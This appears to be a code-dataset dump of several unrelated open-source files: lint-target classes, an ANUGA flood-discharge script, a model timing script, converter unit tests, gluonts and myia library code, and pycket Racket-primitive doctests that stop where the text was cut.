max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
tests/components/generic_thermostat/__init__.py | MrDelik/core | 30,023 | 11096029 | """generic_thermostat tests."""
|
vint/linting/lint_target.py | mosheavni/vint | 538 | 11096033 | <gh_stars>100-1000
from typing import Optional # noqa: F401
from pathlib import Path
from io import BufferedIOBase
class AbstractLintTarget(object):
def __init__(self, path): # type: (Path) -> None
self.path = path
def read(self): # type: () -> bytes
raise NotImplementedError()
class LintTargetFile(AbstractLintTarget):
def __init__(self, path):
# type: (Path) -> None
super(LintTargetFile, self).__init__(path)
def read(self): # type: () -> bytes
with self.path.open('rb') as f:
return f.read()
class LintTargetBufferedStream(AbstractLintTarget):
def __init__(self, alternate_path, buffered_io):
# type: (Path, BufferedIOBase) -> None
super(LintTargetBufferedStream, self).__init__(alternate_path)
self._buffered_io = buffered_io
def read(self): # type: () -> bytes
return self._buffered_io.read()
class CachedLintTarget(AbstractLintTarget):
def __init__(self, lint_target):
# type: (AbstractLintTarget) -> None
super(CachedLintTarget, self).__init__(lint_target.path)
self._target = lint_target
self._cached_bytes = None # type: Optional[bytes]
def read(self): # type: () -> bytes
if self._cached_bytes is not None:
return self._cached_bytes
result = self._target.read()
self._cached_bytes = result
return result
|
examples/cairns_excel/flow_through_cross_sections.py | samcom12/anuga_core | 136 | 11096044 | <filename>examples/cairns_excel/flow_through_cross_sections.py
"""
Post-processing code to compute flux through cross-sections. Implementation
currently uses an approximate method
The user must hard-code the polylines directionay (defining the cross-sections) below.
See the help for 'get_approximate_discharge_timeseries' for info on how the discharge
is computed through the polylines (including how the sign is determined).
The user can either hard-code the sww_filename, knn, and desired_ds (below), or pass them
as command line arguments to the code
This calling approach will use the hard coded values
> python flow_through_cross_sections.py
This calling approach will use the command line arguments [in order the sww
filename, knn, and desired_ds]
> python flow_through_cross_sections.py MODEL_OUTPUTS/RUN_XXXX/mysww.sww 1 500.0
<NAME>, Geoscience Australia 2014+
"""
import sys, os
import pickle
import anuga
from anuga import plot_utils as util
import scipy.spatial
import numpy
from anuga.utilities import spatialInputUtil as su
import matplotlib
# NCI hack, since interactive plotting fails there
try:
from matplotlib import pyplot as pyplot
except:
matplotlib.use('Agg')
from matplotlib import pyplot as pyplot
## USER INPUT ####
# polylines can have multiple segment
polylines = {
'Offshore': [ [666779.0, 8253357.], [673906., 8096367.], [684597., 7983715.]],
'CoastalInlet': [ [393277., 8104579.], [395059., 8095373.]]
}
# Hard-coded values, possibly overwritten by command line arguments
sww_filename = 'MODEL_OUTPUTS/RUN_20150625_110925_cairns_excel/cairns_excel.sww'
knn = 1 # How many neighbours to use for interpolation
desired_ds = 500.0 # Spacing of points along integration lines
## END USER INPUT ###
def get_approximate_discharge_timeseries(sww_filename,
polylines,
desired_ds=0.5,
k_nearest_neighbours=1,
search_mesh=True,
verbose=True):
"""Given an sww_filename and a dictionary of 1D polylines, estimate the
discharge timeseries through each polyline by interpolating the centroid
uh/vh onto evenly spaced points on the polyline (with spacing ~ desired_ds),
computing the flux normal to the line, and using the trapezoidal rule to
integrate it.
The interpolation of centroid uh/vh onto the polyline points can be either
based on 'k-nearest-neighbours', or a direct-search of the mesh triangles.
The former can be fast and allow for smoothing, while the latter is often
still fast enough, and might be more accurate.
The positive/negative discharge direction is determined from the polyline.
Consider a river channel. If the polyline begins on the left-bank and ends
on the right bank (left/right defined when facing downstream) then
discharge in the downstream direction is positive.
WARNING: The result is approximate only because ANUGA's internal edge
fluxes are derived differently (with the reimann solver), and because the
interpolation does not follow ANUGA's, and because your transect might not
be exactly perpendicular to the flow. None of the methods give an exact
result at present.
Errors can be significant where the solution is changing rapidly. It may
be worth comparing multiple cross-sections in the vicinity of the site of
interest [covering different mesh triangles, with slightly different
orientations].
@param sww_filename name of sww file
@param polylines dictionary of polylines, e.g.
polylines = {
'Xsection1': [ [495., 1613.], [495., 1614.], [496., 1615.] ],
'Xsection2': [ [496., 1614.], [4968., 1615.] ]
}
@param desired_ds point spacing used for trapozoidal integration on
polylines
@param k_nearest_neighbours number of nearest neighbours used for
interpolation of uh/vh onto polylines
@param search_mesh If True AND k_nearest_neighbours=1, we search the
mesh vertices to find the triangle containing our point. Otherwise
do nearest-neighbours on the triangle centroids to estimate the
'nearest' triangle
@param verbose
@return a list of length 2 with the output_times as a numpy array, and a
dictionary with the flow timeseries
"""
if (search_mesh) & (k_nearest_neighbours > 1):
msg = 'k_nearest_neighbours must be 1 when search_mesh is true'
raise Exception(msg)
# 2 ways to associate transect points with triangle values
# 1) knn on centroids, or
# 2) directly search for mesh triangles containing transect points
# 1 can be faster + allows for smoothing, but 2 might be usually better
use_knn = (search_mesh == False) | (k_nearest_neighbours != 1)
if use_knn:
# Centroids are used for knn
p = util.get_centroids(sww_filename, timeSlices=0)
sww_xy = numpy.vstack([p.x+p.xllcorner, p.y+p.yllcorner]).transpose()
point_index_kdtree = scipy.spatial.cKDTree(sww_xy)
else:
# Vertices are used for mesh search
p = util.get_output(sww_filename, timeSlices=0)
# To conserve memory read from netcdf directly
from anuga.file.netcdf import NetCDFFile
sww_nc = NetCDFFile(sww_filename)
ud = sww_nc.variables['xmomentum_c']
vd = sww_nc.variables['ymomentum_c']
output_times = sww_nc.variables['time'][:]
discharge_series = {}
for pk in polylines.keys():
if verbose: print pk
pl_full = polylines[pk]
for segment_num in range(len(pl_full)-1):
pl = [ pl_full[segment_num], pl_full[segment_num + 1] ]
segment_length = ( (pl[0][0] - pl[1][0])**2 +\
(pl[0][1] - pl[1][1])**2 )**0.5
# Normal vector
n1 = (pl[0][1] - pl[1][1])/segment_length
n2 = -(pl[0][0] - pl[1][0])/segment_length
# Approximate segment as npts points
npts = int(numpy.ceil( segment_length / (desired_ds) + 1.0))
gridXY = numpy.vstack([scipy.linspace(pl[0][0], pl[1][0], num=npts),
scipy.linspace(pl[0][1], pl[1][1], num=npts)]
).transpose()
# Actual distance between points
ds = (numpy.diff(gridXY[:,0])**2 + numpy.diff(gridXY[:,1])**2)**0.5
ds_trapz = numpy.hstack([ ds[0], (ds[0:-1] + ds[1:]), ds[-1]])*0.5
if verbose: print 'Finding triangles containing point'
if use_knn:
point_distance, point_indices = point_index_kdtree.query(gridXY,
k = k_nearest_neighbours)
else:
gridXY_offset = gridXY*0.
gridXY_offset[:,0] = gridXY[:,0] - p.xllcorner
gridXY_offset[:,1] = gridXY[:,1] - p.yllcorner
point_indices = numpy.zeros( gridXY.shape[0]).astype(int)
# Provide the order to search the points (might be faster?)
v1 = p.vols[:,0]
search_order_update_freq = 1
for i in range(gridXY.shape[0]):
# For efficiency, we don't recompute the order to search points
# everytime
if i%search_order_update_freq==0:
# Update the mesh triangle search order
first_vertex_d2 = (p.x[v1] - gridXY_offset[i,0])**2 +\
(p.y[v1] - gridXY_offset[i,1])**2
search_order = first_vertex_d2.argsort().tolist()
# Estimate how often we should update the triangle ordering
# Use "distance of point to vertex" / "point spacing"
# Crude
search_order_update_freq = \
int(numpy.ceil((first_vertex_d2[search_order[0]]**0.5)/ds[0]))
point_indices[i] =\
util.get_triangle_containing_point(p, gridXY_offset[i,:],
search_order = search_order)
if verbose: print 'Computing the flux'
if k_nearest_neighbours == 1:
point_uh = ud[:][:, point_indices]
point_vh = vd[:][:, point_indices]
else:
point_uh = numpy.zeros( (len(output_times),
len(point_indices[:,0])))
point_vh = numpy.zeros( (len(output_times),
len(point_indices[:,0])))
# Compute the inverse distance weighted uh/vh
numerator = point_uh*0.
denominator = point_uh*0.
inv_dist = 1.0/(point_distance+1.0e-12) #Avoid zero division
# uh
for k in range(k_nearest_neighbours):
ud_data = ud[:][:,point_indices[:,k]]
for ti in range(len(output_times)):
numerator[ti,:] += ud_data[ti,:]*inv_dist[:,k]
denominator[ti,:] += inv_dist[:,k]
point_uh = numerator/denominator
#vh
numerator *= 0.
denominator *= 0.
for k in range(k_nearest_neighbours):
vd_data = vd[:][:,point_indices[:,k]]
for ti in range(len(output_times)):
numerator[ti,:] += vd_data[ti,:]*inv_dist[:,k]
denominator[ti,:] += inv_dist[:,k]
point_vh = numerator/denominator
Q = [ ((point_uh[i,:]*n1 + point_vh[i,:]*n2)*ds_trapz).sum() \
for i in range(len(output_times)) ]
if segment_num == 0:
discharge_series[pk] = numpy.array(Q)
else:
discharge_series[pk] += numpy.array(Q)
return [output_times, discharge_series]
def plot_discharge_timeseries(discharge_series_in, output_times, subset=None):
"""Quick-and-dirty plot of the discharge timeseries
"""
if subset is not None:
discharge_series = discharge_series_subset(discharge_series_in, subset)
else:
discharge_series = discharge_series_in
## Plot all series
site_order = discharge_series.keys()
line_types = ['-', '-.', '--']
site_order.sort()
for i, pk in enumerate(site_order):
pyplot.plot(output_times, discharge_series[pk],
line_types[i%3], label=pk)
pyplot.legend(loc=3, fontsize='xx-small')
pyplot.plot(output_times, output_times*0.,'--',color='black')
return
def discharge_series_subset(discharge_series, river_name_pattern):
"""Make a new discharge_series dictionary from all sites which match a
pattern
"""
discharge_series_keys = discharge_series.keys()
river_keys = [ discharge_series_keys[i] \
for i in su.matchInds(river_name_pattern, discharge_series_keys) ]
new_discharge_series = {}
for rk in river_keys:
new_discharge_series[rk] = discharge_series[rk]
return new_discharge_series
###############################################################################
if __name__ == '__main__':
# Parse command line arguments
if len(sys.argv)>1:
sww_filename = sys.argv[1]
if len(sys.argv)>2:
knn = int(sys.argv[2])
if len(sys.argv) > 3:
desired_ds = float(sys.argv[3])
if knn==1:
search_mesh = True
else:
search_mesh = False
assert os.path.exists(sww_filename), 'sww_filename not found'
print 'sww_filename: ' + sww_filename
print 'knn: ' + str(knn)
print 'desired_ds: ' + str(desired_ds)
print ''
output_times, discharge_series = get_approximate_discharge_timeseries(
sww_filename, polylines, desired_ds=desired_ds,
k_nearest_neighbours=knn, search_mesh=search_mesh)
# Pickle outputs
output_pickle = os.path.join(os.path.dirname(sww_filename),
'discharge_series.pkl')
pickle.dump([output_times, discharge_series],
open(output_pickle, 'w'))
# Now write in text format
for key in discharge_series.keys():
temp_array = numpy.vstack([output_times, discharge_series[key]]).transpose()
numpy.savetxt(
(os.path.join(os.path.dirname(sww_filename), key + '.csv')),
temp_array,
delimiter=',')
# Lots of plots
#try:
# pyplot.ion()
# pyplot.figure()
# plot_discharge_timeseries(discharge_series, output_times)
# rivers = ['Offshore', 'CoastalInlet']
# for river in rivers:
# pyplot.figure()
# plot_discharge_timeseries(discharge_series, output_times, river)
# pyplot.title(river)
#except:
# print 'Interactive plotting failed (expected on NCI)'
|
test/pre_train/model_stats_perf.py | chao1412732094/tensorwatch | 3,453 | 11096053 | import copy
import tensorwatch as tw
import torchvision.models
import torch
import time
model = getattr(torchvision.models, 'densenet201')()
def model_timing(model):
st = time.time()
for _ in range(20):
batch = torch.rand([64, 3, 224, 224])
y = model(batch)
return time.time()-st
print(model_timing(model))
model_stats = tw.ModelStats(model, [1, 3, 224, 224], clone_model=False)
print(f'flops={model_stats.Flops}, parameters={model_stats.parameters}, memory={model_stats.inference_memory}')
print(model_timing(model))
|
tests/converters/test_odbc_uplink_converter.py | linxingchao/tb_gateway_with_extension | 1,123 | 11096065 | <filename>tests/converters/test_odbc_uplink_converter.py
# Copyright 2020. ThingsBoard
#
# Licensed under the Apache License, Version 2.0 (the "License"];
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from random import randint, uniform, choice
from string import ascii_lowercase
from thingsboard_gateway.connectors.odbc.odbc_uplink_converter import OdbcUplinkConverter
class OdbcUplinkConverterTests(unittest.TestCase):
def setUp(self):
self.converter = OdbcUplinkConverter()
self.db_data = {"boolValue": True,
"intValue": randint(0, 256),
"floatValue": uniform(-3.1415926535, 3.1415926535),
"stringValue": "".join(choice(ascii_lowercase) for _ in range(8))}
def test_glob_matching(self):
converted_data = self.converter.convert("*", self.db_data)
self.assertDictEqual(converted_data, self.db_data)
def test_data_subset(self):
config = ["floatValue", "boolValue"]
converted_data = self.converter.convert(config, self.db_data)
expected_data = {}
for key in config:
expected_data[key] = self.db_data[key]
self.assertDictEqual(converted_data, expected_data)
def test_alias(self):
config = [{"column": "stringValue", "name": "valueOfString"}]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data[config[0]["column"]]})
def test_name_expression(self):
attr_name = "someAttribute"
config = [{"nameExpression": "key", "value": "intValue"}]
self.db_data["key"] = attr_name
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {attr_name: self.db_data[config[0]["value"]]})
def test_value_config(self):
config = [{"name": "someValue", "value": "stringValue + str(intValue)"}]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[0]["name"]: self.db_data["stringValue"] + str(self.db_data["intValue"])})
def test_one_valid_one_invalid_configs(self):
config = ["unkownColumnValue", "stringValue"]
converted_data = self.converter.convert(config, self.db_data)
self.assertDictEqual(converted_data, {config[1]: self.db_data[config[1]]})
if __name__ == '__main__':
unittest.main()
|
src/gluonts/mx/distribution/bijection_output.py | Xiaoxiong-Liu/gluon-ts | 2,648 | 11096087 | <reponame>Xiaoxiong-Liu/gluon-ts<filename>src/gluonts/mx/distribution/bijection_output.py
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
from typing import Tuple
from gluonts.core.component import validated
from gluonts.mx import Tensor
from .bijection import Bijection
from .distribution_output import Output
class BijectionOutput(Output):
"""
Class to connect a network to a bijection
"""
bij_cls: type
@validated()
def __init__(self) -> None:
pass
def domain_map(self, F, *args: Tensor):
raise NotImplementedError()
def bijection(self, bij_args: Tensor) -> Bijection:
return self.bij_cls(*bij_args)
@property
def event_shape(self) -> Tuple:
raise NotImplementedError()
|
myia/operations/prim_split.py | strint/myia | 222 | 11096096 | <reponame>strint/myia<gh_stars>100-1000
"""Definitions for the primitive `split`."""
import numpy as np
from ..lib import (
SHAPE,
TYPE,
AbstractTuple,
bprop_to_grad_transform,
standard_prim,
)
from ..operations import concat, zeros_like
from . import primitives as P
def pyimpl_split(x, sections, dim):
"""Implement `split`."""
sections = tuple(np.cumsum(sections))[:-1]
return np.split(x, sections, axis=dim)
@standard_prim(P.split)
async def infer_split(self, engine, x, sections, dim):
"""Infer the return type of primitive `split`."""
sections_v = [e.xvalue() for e in sections.elements]
x_shp_v = x.xshape()
dim_v = dim.xvalue()
shp_r = ()
for s in sections_v:
shp_r = shp_r + (x_shp_v[:dim_v] + (s,) + x_shp_v[dim_v + 1 :],)
return AbstractTuple(
[
type(x)(x.element, {SHAPE: out_shape, TYPE: x.xtype()})
for out_shape in shp_r
]
)
@bprop_to_grad_transform(P.split)
def bprop_split(x, sections, dim, out, dout):
"""Backpropagator for primitive `split`."""
x_grad = concat(dout, dim)
return (x_grad, zeros_like(sections), zeros_like(dim))
__operation_defaults__ = {
"name": "split",
"registered_name": "split",
"mapping": P.split,
"python_implementation": pyimpl_split,
}
__primitive_defaults__ = {
"name": "split",
"registered_name": "split",
"type": "backend",
"python_implementation": pyimpl_split,
"inferrer_constructor": infer_split,
"grad_transform": bprop_split,
}
|
pycket/test/test_prims.py | namin/pycket | 129 | 11096099 | <gh_stars>100-1000
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# A place for testing primitives
#
import pytest
import os
import sys
from pycket import values
from pycket.values import w_true
from pycket.test.testhelper import check_all, check_none, check_equal, run_flo, run_fix, run, run_mod, run_mod_expr
skip = pytest.mark.skipif("True")
def test_equal():
check_all(
"(equal? 1 1)",
"(equal? 1.5 (+ 0.5 1))",
"(equal? 1+1i 1+1i)",
"(equal? 'foo 'foo)",
"(equal? '() '())",
"(equal? #f #f)",
"(equal? #t #t)",
"(equal? (cons 1 2) (cons 1 2))",
"(equal? (vector->list (make-vector 10000 5)) (vector->list (make-vector 10000 5)))",
"(equal? #() #())",
"(equal? #(1) #(1))",
"(equal? #(1 2) #(1 2))",
'(equal? "abc" "abc")',
)
check_none(
"(equal? 1 2)",
"(equal? 1 2.2)",
"(equal? 1 1.0)",
"(equal? 1+1i 1.0+0i)",
"(equal? 1+1i 1)",
"(equal? 'foo 'bar)",
"(equal? '() #f)",
"(equal? #f #t)",
"(equal? (cons 1 2) (cons 1 4))",
"(equal? (cons 2 2) (cons 1 2))",
"(equal? (cons 2 (cons 1 2)) (cons 1 (cons 1 (cons 1 6))))",
"(equal? #(1) #())",
"(equal? #(1 2 3 4 5) #(1 2 3 4 6))",
"(equal? #(1 2 3 4 5) #(1 2 3 4 'a))",
'(equal? "abc" "def")',
)
def test_equal2(doctest):
"""
! (require racket/base)
> (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/bash"))
#t
> (equal? (string->path "/usr/bin/bash") (string->path "/usr/bin/tcsh"))
#f
"""
###############################################################################
def test_append_single(doctest):
"""
> (append #f)
#f
> (append (list 1 2) (list 3 4))
'(1 2 3 4)
"""
assert doctest
def test_append_vararg(doctest):
"""
> (append (list 1 2) (list 3 4) (list 5 6) (list 7 8))
'(1 2 3 4 5 6 7 8)
"""
assert doctest
def test_for_each_single(doctest):
"""
! (require (only-in '#%kernel for-each))
> (let ([x 0])
(for-each (lambda (y)
(set! x (+ x y)))
'(1 2 3))
x)
6
"""
assert doctest
def test_for_each_vararg(doctest):
"""
! (require (only-in '#%kernel for-each))
> (let ([x 1])
(for-each (lambda (a b c)
(set! x (+ x (* a b c))))
'(1 2 3) '(4 5 6) '(7 8 9))
x)
271
"""
assert doctest
def test_map(doctest):
"""
! (require (only-in '#%kernel map))
> (map (lambda (number)
(+ 1 number))
'(1 2 3 4))
'(2 3 4 5)
> (map (lambda (number1 number2)
(+ number1 number2))
'(1 2 3 4)
'(10 100 1000 10000))
'(11 102 1003 10004)
E (map)
E (map (lambda (x) 1))
E (map (lambda (x) 1) (list 1 2) (list 2 3))
"""
assert doctest
def test_shorthands(doctest):
"""
> (caar '((1 2) 3 4))
1
> (cadr '((1 2) 3 4))
3
> (cdar '((7 6 5 4 3 2 1) 8 9))
'(6 5 4 3 2 1)
> (cddr '(2 1))
'()
> (caaar '(((6 5 4 3 2 1) 7) 8 9))
6
> (caadr '(9 (7 6 5 4 3 2 1) 8))
7
> (cadar '((7 6 5 4 3 2 1) 8 9))
6
> (caddr '(3 2 1))
1
> (cdaar '(((6 5 4 3 2 1) 7) 8 9))
'(5 4 3 2 1)
> (cdadr '(9 (7 6 5 4 3 2 1) 8))
'(6 5 4 3 2 1)
> (cddar '((7 6 5 4 3 2 1) 8 9))
'(5 4 3 2 1)
> (cdddr '(3 2 1))
'()
> (caaaar '((((5 4 3 2 1) 6) 7) 8 9))
5
> (caaadr '(9 ((6 5 4 3 2 1) 7) 8))
6
> (caadar '((7 (5 4 3 2 1) 6) 8 9))
5
> (caaddr '(9 8 (6 5 4 3 2 1) 7))
6
> (cadaar '(((6 5 4 3 2 1) 7) 8 9))
5
> (cadadr '(9 (7 6 5 4 3 2 1) 8))
6
> (caddar '((7 6 5 4 3 2 1) 8 9))
5
> (cadddr '(4 3 2 1))
1
> (cdaaar '((((5 4 3 2 1) 6) 7) 8 9))
'(4 3 2 1)
> (cdaadr '(9 ((6 5 4 3 2 1) 7) 8))
'(5 4 3 2 1)
> (cdadar '((7 (5 4 3 2 1) 6) 8 9))
'(4 3 2 1)
> (cdaddr '(9 8 (6 5 4 3 2 1) 7))
'(5 4 3 2 1)
> (cddaar '(((6 5 4 3 2 1) 7) 8 9))
'(4 3 2 1)
> (cddadr '(9 (7 6 5 4 3 2 1) 8))
'(5 4 3 2 1)
> (cdddar '((7 6 5 4 3 2 1) 8 9))
'(4 3 2 1)
> (cddddr '(4 3 2 1))
'()
"""
def test_random():
for i in range(100):
x = run_flo("(random)")
assert 0.0 <= x < 1.0
x = run_fix("(random %s)" % (5 + i))
if pytest.config.new_pycket:
assert 0 <= x.value < i + 5
else:
assert 0 <= x < i + 5
def test_random_seed():
run("(begin (random-seed 142) (let-values (((x) (random))) (random-seed 142) (= (random) x)))", w_true)
def test_byte_huh(doctest):
"""
> (byte? 65)
#t
> (byte? 0)
#t
> (byte? 256)
#f
> (byte? -1)
#f
"""
def test_make_bytes_create(doctest):
"""
> (make-bytes 5 65)
#"AAAAA"
E (make-bytes 5 11111)
> (bytes 65 112 112 108 101)
#"Apple"
> (bytes)
#""
"""
def test_make_string_create(doctest):
"""
> (make-string 5 #\A)
"AAAAA"
> (string #\A #\p #\p #\l #\e)
"Apple"
> (string)
""
"""
def test_list_to_bytes(doctest):
"""
> (list->bytes (list 65 112 112 108 101))
#"Apple"
"""
def test_bytes(doctest):
"""
> (bytes-length #"Apple")
5
> (bytes-ref #"Apple" 0)
65
> (define s (bytes 65 112 112 108 101))
> (bytes-set! s 4 121)
> s
#"Apply"
"""
def test_unsafe_bytes(doctest):
"""
! (require '#%unsafe)
> (unsafe-bytes-length #"Apple")
5
> (unsafe-bytes-ref #"Apple" 0)
65
> (define s (bytes 65 112 112 108 101))
> (unsafe-bytes-set! s 4 121)
> s
#"Apply"
"""
def test_subbytes(doctest):
"""
> (subbytes #"Apple" 1 3)
#"pp"
> (subbytes #"Apple" 1)
#"pple"
"""
def test_bytes_copy_bang(doctest):
"""
> (define s (bytes 65 112 112 108 101))
> (bytes-copy! s 4 #"y")
> (bytes-copy! s 0 s 3 4)
> s
#"lpply"
"""
def test_open_input_bytes_and_read_bytes_line(source):
"""
(let* ([b (string->bytes/utf-8 "ABC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n")]
[expected '(#"MNOP" #"" #"" #"JKL" #"" #"GHI" #"" #"DEF" #"ABC")]
[inport (open-input-bytes b)])
(let ([res (let rev ([lines null])
(let ([line (read-bytes-line inport)])
(if (eof-object? line)
lines
(rev (cons line lines)))))])
(equal? res expected)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_read_bytes(source):
"""
(let ([ip (open-input-bytes (bytes 115 101 99 114 101 116))])
(read-bytes 6 ip))
"""
result = run_mod_expr(source, wrap=True)
assert isinstance(result, values.W_Bytes)
assert result.value == list("secret")
def test_read_utf8_bytes_chars(source):
ur"""
(let* ([b "ÄÖÜ"]
[inport (open-input-string b)]
[res1 (read-byte inport)]
[res2 (read-byte inport)]
[res3 (read-char inport)]
)
(and
(equal? res1 195)
(equal? res2 132)
(equal? res3 #\Ö)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_open_input_and_read_line(source):
u"""
(let* ([b "ÄBC\nDEF\n\nGHI\n\nJKL\n\n\nMNOP\n"]
[expected '("MNOP" "" "" "JKL" "" "GHI" "" "DEF" "ÄBC")]
[inport (open-input-string b)])
(let ([res (let rev ([lines null])
(let ([line (read-line inport)])
(if (eof-object? line)
lines
(rev (cons line lines)))))])
(equal? res expected)))
"""
result = run_mod_expr(source, wrap=True)
assert result == w_true
def test_bytes_port(doctest):
r"""
;> (define op1 (open-output-bytes))
;> (write '((1 2 3) ("Tom" "Dick") ('a 'b 'c)) op1)
;> (get-output-bytes op1)
; #"((1 2 3) (\"Tom\" \"Dick\") ((quote a) (quote b) (quote c)))"
;> (define op2 (open-output-bytes))
;> (write "Hi " op2)
;> (write "there" op2)
;> (get-output-bytes op2)
; #"\"Hi \"\"there\""
! (define op3 (open-output-bytes))
> (write-bytes #"Hi " op3)
3
> (display #"there" op3)
> (get-output-bytes op3)
#"Hi there"
"""
####################
def test_procedure_arity(doctest):
"""
! (require racket/private/norm-arity)
> (procedure-arity cons)
2
> (procedure-arity list)
(arity-at-least 0)
> (arity-at-least? (procedure-arity list))
#t
> (arity-at-least-value (procedure-arity list))
0
> (arity-at-least-value (procedure-arity (lambda (x . y) x)))
1
> (procedure-arity (case-lambda [(x) 0] [(x y) 1]))
'(1 2)
"""
def test_procedure_arity_includes(doctest):
"""
! (require racket/private/kw)
> (procedure-arity-includes? cons 2)
#t
> (procedure-arity-includes? display 3)
#f
> (procedure-arity-includes? (lambda (x #:y y) x) 1)
#f
> (procedure-arity-includes? (lambda (x #:y y) x) 1 #t)
#t
"""
#############################################################################
def test_system_type_os(source):
"""(cons (system-type) (system-type 'os))"""
result = run_mod_expr(source, wrap=True)
assert result.car() == result.cdr()
sym = result.car().asciivalue()
# Sadly, this can never cover all cases.
if sys.platform == "darwin":
assert sym == "macosx"
elif sys.platform in ['win32', 'cygwin']:
assert sym == "windows"
else:
assert sym == "unix"
def test_system_path_convention_type(source):
"""(system-path-convention-type)"""
result = run_mod_expr(source, wrap=True)
sym = result.asciivalue()
if sys.platform in ['win32', 'cygwin']:
assert sym == "windows"
else:
assert sym == "unix"
@pytest.mark.skip(reason="will be solved when tostring is not 'write'")
def test_number_to_string(doctest):
"""
> (number->string 10)
"10"
> (number->string -10)
"-10"
> (number->string -1.1)
"-1.1"
> (number->string -5.5)
"-5.5"
> (number->string -17+1i)
"-17+1i"
> (number->string -5/6)
"-5/6"
> (number->string 1 16)
"1"
> (number->string 10 16)
"a"
> (number->string 111 16)
"6f"
E (number->string 111 -164)
> (number->string -164 16)
"-a4"
E (number->string -164.3 16)
;> (number->string -4/5 16)
;"-4/5"
;> (number->string -4/12311 16)
;"-4/3017"
> (number->string 111111111111111111111111111111111111111111111111111111111111111111111111111111111 16)
"3bf9304450677dc5f60e4afde2a26b6546f195ed670022bc71c71c71c71c71c71c7"
"""
def test_list_to_string(doctest):
r"""
> (list->string (list #\A #\p #\p #\l #\e))
"Apple"
"""
def test_char_cmp_huh(doctest):
r"""
> (char=? #\a #\a)
#t
> (char=? #\a #\A #\a)
#f
> (char<? #\A #\a)
#t
> (char<? #\a #\A)
#f
> (char<? #\a #\b #\c)
#t
> (char<=? #\A #\a)
#t
> (char<=? #\a #\A)
#f
> (char<=? #\a #\b #\b)
#t
> (char>? #\A #\a)
#f
> (char>? #\a #\A)
#t
> (char>? #\c #\b #\a)
#t
> (char>=? #\A #\a)
#f
> (char>=? #\a #\A)
#t
> (char>=? #\c #\b #\b)
#t
> (char-ci=? #\A #\a)
#t
> (char-ci=? #\a #\a #\a)
#t
> (char-ci<? #\A #\a)
#f
> (char-ci<? #\a #\b)
#t
> (char-ci<? #\a #\b #\c)
#t
> (char-ci<=? #\A #\a)
#t
> (char-ci<=? #\a #\A)
#t
> (char-ci<=? #\a #\b #\b)
#t
> (char-ci>? #\A #\a)
#f
> (char-ci>? #\b #\A)
#t
> (char-ci>? #\c #\b #\a)
#t
> (char-ci>=? #\A #\a)
#t
> (char-ci>=? #\a #\A)
#t
> (char-ci>=? #\c #\b #\b)
#t
"""
def test_char_prop_huh(doctest):
r"""
> (char-alphabetic? #\a)
#t
> (char-alphabetic? #\=)
#f
> (char-numeric? #\0)
#t
> (char-numeric? #\=)
#f
> (char-whitespace? #\tab)
#t
> (char-whitespace? #\=)
#f
"""
def test_gcd_lcm(doctest):
"""
> (gcd 10)
10
> (gcd 12 81.0)
3.0
> (gcd 1/2 1/3)
1/6
> (lcm 10)
10
> (lcm 3 4.0)
12.0
> (lcm 1/2 2/3)
2
"""
def test_read(doctest):
"""
! (define (rs s) (read (open-input-string s)))
> (rs "1")
1
> (rs "#t")
#t
> (rs "abc")
'abc
> (define s (open-input-string "1 #t abc"))
> (read s)
1
> (read s)
#t
> (read s)
'abc
> (rs "()")
'()
> (rs "(1)")
'(1)
> (rs "(1 2 3 a b c)")
'(1 2 3 a b c)
> (rs "(1 (2 3) (a (b c)))")
'(1 (2 3) (a (b c)))
> (rs "[]")
'[]
> (rs "[]")
'()
> (rs "[1]")
'[1]
> (rs "[1 2 3 a b c]")
'[1 2 3 a b c]
> (rs "[1 [2 3] [a [b c]]]")
'[1 [2 3] [a [b c]]]
> (rs "(1 . 2)")
(cons 1 2)
> (rs "(a . b)")
(cons 'a 'b)
> (rs "(a.b . c.d)")
(cons 'a.b 'c.d)
> (rs "...")
'...
> (rs "'(1)")
''(1)
> (rs "`(1)")
'`(1)
> (rs "`(,1)")
'`(,1)
> (rs "\\"1\\"")
"1"
> (rs "\\"'abc\\"")
"'abc"
> (rs "\\"hello jed\\"")
"hello jed"
> (rs "\\"abc.123\\"")
"abc.123"
> (rs "\\"\\t\\n\\"")
"\\t\\n"
> (rs "ab;cd")
'ab
> (rs "12;cd\\n")
12
> (define s2 (open-input-string "12;\\n34"))
> (read s2)
12
> (read s2)
34
> (rs "#'()")
'(syntax ())
> (rs "#`()")
'(quasisyntax ())
> (rs "#`(#,x)")
'(quasisyntax ((unsyntax x)))
> (rs "#`(#,@x)")
'(quasisyntax ((unsyntax-splicing x)))
"""
def test_close_port(doctest):
"""
> (define sp (open-input-string "(apples 42 day)"))
> (port-closed? sp)
#f
> (close-input-port sp)
> (port-closed? sp)
#t
> (define op (open-output-string))
> (port-closed? op)
#f
> (close-output-port op)
> (port-closed? op)
#t
"""
def test_port_read_peek(doctest):
r"""
> (define sp (open-input-string "(apples 42 day)"))
> (peek-char sp)
#\(
> (peek-char sp 5)
#\e
> (read-char sp)
#\(
> (define bp (open-input-bytes #"(apples 42 day)"))
> (peek-byte bp)
40
> (peek-byte bp 5)
101
> (read-byte bp)
40
